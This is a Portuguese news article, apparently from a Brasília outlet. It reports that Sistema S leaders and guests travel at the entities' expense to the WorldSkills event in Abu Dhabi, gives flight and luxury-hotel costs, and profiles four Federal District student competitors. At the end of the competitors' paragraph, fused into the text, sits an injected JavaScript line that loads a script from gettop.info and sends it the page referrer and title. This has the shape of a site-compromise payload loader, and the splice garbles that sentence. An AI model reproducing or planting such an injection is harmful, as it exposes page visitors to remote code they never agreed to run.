Dirigentes e convidados do Sistema S farão turismo em Abu Dhabi

Jamal Bittar, presidente da FIBRA: assessoria não confirma viagem. Foto: Andre Borges Agência Brasília.

Um time de 54 estudantes do Serviço Nacional de Aprendizagem Industrial (Senai), do Serviço Nacional do Comércio (Senac) e uma do Instituto Federal de Educação (IFE) participará, de 16 a 19 de outubro, em Abu Dhabi, nos Emirados Árabes, da 44ª edição da World Skills – competição internacional de profissões técnicas realizada a cada dois anos.

Mas, a delegação brasileira – coordenada em todo o país pela Confederação Nacional da Indústria (CNI) – não será integrada apenas pelos alunos de Marcenaria de Móveis, Aplicação de Revestimento Cerâmico, Mecânica de Refrigeração, entre outros cursos técnicos. Junto com eles, embarcarão para o Oriente Médio seus instrutores e dezenas de dirigentes de entidades ligadas ao Sistema S e seus convidados. Todos com as despesas pagas pelas entidades (Senai, Senac, federações e confederação).

A delegação brasileira – alunos, dirigentes e convidados (neste grupo estarão alguns “experts” que atuarão como árbitros em suas especialidades) – partirá do aeroporto de Guarulhos, em São Paulo, em voos da companhia aérea Emirates, nos dias 5, 7 e 10 de outubro. As 190 passagens foram emitidas em maio pela agência AMG por US$ 1.700 (cerca de R$ 5.200 pelo câmbio de quinta-feira, dia 15 de setembro). Um gasto em torno de R$ 988 mil apenas com as passagens aéreas.

Também correrá por conta do Sistema S a hospedagem dos 190 participantes em Abu Dhabi. A Federação das Indústrias do Distrito Federal (Fibra), cujo presidente Jamal Bittar deverá integrar a comitiva, não informou à reportagem do Brasília Capital o gasto com a viagem.

Mas a reportagem apurou que as reservas estavam a cargo das agências AGM Turismo e Objetivo Turismo, que também não confirmaram a contratação dos serviços pelo Senai e pelo Sesi, além da Confederação Nacional da Indústria (CNI). Mas, nos hotéis indicados  – o Ritz Carlton Abu Dhabi, o Ritz-Carlton Difc e o Al Wadi Desert Hotel – a diária mais barata não fica por menos de R$ 1.492, como informa o site de pesquisa Hotel Hunter.

Programação

Conforme a programação oficial do World Skills, os presidentes das delegações chegarão a Dubai no dia 13 de outubro e ficarão hospedados no Ritz Carlton Abu Dhabi. No sábado (14), depois do almoço, participarão da abertura oficial no centro de convenções da cidade. Após a solenidade serão recebidos em um jantar.

No domingo (15), haverá um city tour panorâmico em Abu Dhabi, com visita à famosa mesquita e passeio no Parque da Ferrari, com opção para quem quiser fazer compras. O almoço e o jantar serão livres. Na segunda-feira (16) será feita a primeira visita ao local das competições da World Skills. Isto se repetirá no dia 17. Já na quarta-feira (18), haverá um passeio pelo deserto, com direito a jantar árabe no Al Wadi Desert Hotel.

De volta a Dubai no dia 19, alguns participantes retornarão ao Brasil. Quem permanecer nos Emirados Árabes ficará hospedado no Ritz-Carlton Difc, em Dubai, onde participará do encerramento da World Skills, na mesma quinta-feira. Os acompanhantes, que chegarão a partir do dia 13 de outubro, terão direito de participar praticamente da mesma programação dos dirigentes.

Estudantes de Taguatinga competem em Abu Dhabai

Ritz-Carlton Difc    Da parte efetiva da viagem – a que de fato interessa aos 54 jovens em busca de aperfeiçoamento profissional – participam quatro estudantes do Distrito Federal. Eles têm a missão de manter o Brasil no topo do pódio – em 2015, o país com o campeão da competição realizada em São Paulo.

Wisley Silva Pereira, de 21 anos, aluno do Senai de Taguatinga Norte, tentará se tornar o melhor do mundo em Mecânica de Refrigeração. Nascido em Serra Dourada, na Bahia, ele mora há três em Santa Maria, a 30 Km de Taguatinga. Desde agosto do ano passado, quando venceu a seletiva nacional,  enfrenta uma rotina diária de 8h a 10h de treinos no Centro Integrado do Senai, no Setor de Indústrias Gráficas, com preparação física e psicológica.

“Ganha o prêmio quem executar melhor o sistema de refrigeração seguindo as normas da área, que é um padrão internacional. Serão quatro dias de prova, totalizando 20h, divididas em quatro módulos. Estou me preparando psicologicamente, porque isso conta muito na hora da prova. E estou trabalhando para alcançar o primeiro lugar”, disse Wisley.

A inspiração vem do instrutor Willian Grassioti, de 26 anos, que foi aluno do Senai de Taguatinga Norte. Em 2011, na Worls Skills de Londres, ele sagrou-se campeão da modalidade. Nesta edição, os medalhistas terão uma bolsa de estudos de até R$ 3 mil a ser utilizada por até cinco anos.

            Cerâmica

Gilberto Ferreira dos Santos, de 19 anos. Foto: Antonio Sabino

O representante do DF em Aplicação de Revestimento Cerâmico é Gilberto Ferreira dos Santos, de 19 anos. Munido de régua, furadeira, cortador de vidro e outras ferramentas, o maranhense sonha em proporcionar um futuro melhor para a família. Parte dela mora com ele em Engenho das Lajes, divisa do DF com Goiás, a 40 Km de Taguatinga. O restante da família ainda está no Maranhão.

“É a segunda vez que vou para uma competição internacional. Em julho, fui para Rússia, mas perdi. Estava sem minhas ferramentas e isso conta muito. Espero vencer desta vez. O mais importante é fazer um bom corte na cerâmica para o desenho final ficar preciso. Além do resultado final, o planejamento de cada etapa da montagem é importante e conta pontos”, disse.

O DF será representado, ainda, por outros dois competidores: Fábio Serpa Crisóstomo, em Marcenaria de Móveis, e Wanderson Carlos Coimbra dos Santos, em Sistema de DryWall e Gesso.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário